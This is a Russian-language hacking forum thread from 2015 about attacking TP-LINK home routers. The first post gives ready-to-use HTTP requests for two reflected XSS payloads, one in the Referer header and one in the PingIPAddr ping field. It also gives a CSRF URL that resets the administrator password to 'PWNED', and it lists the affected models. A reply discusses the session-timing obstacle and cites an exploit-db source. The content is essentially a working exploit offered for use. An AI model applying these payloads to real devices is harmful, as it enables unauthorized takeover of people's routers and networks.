Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Взлом TP-LINK Роутера | Используем XSS-уязвимость (https://forum.antichat.xyz/showthread.php?t=431391)

Mican 11.10.2015 13:07

1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере.

Код:

GET /doesnotexist HTTP/1.1
Host: 192.168.1.1
Referer: http://mican">alert("XSS")
Connection: keep-alive

2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr.

Код:

Host:
Referer: http:///maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+

3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос:

Код:

http:///Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED
WDR740ND, WDR740N, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N

faza02 11.10.2015 13:25

сложность в том, что сессия там держится не долго, т. е. жертва обязательно должна сама авторизоваться у себя в роутере перед эксплуатацией - что сделать довольно сложно. разве что, предположить, что там дефолтные логин и пароль.

принято указывать источник: https://www.exploit-db.com/exploits/28055/


Время: 12:53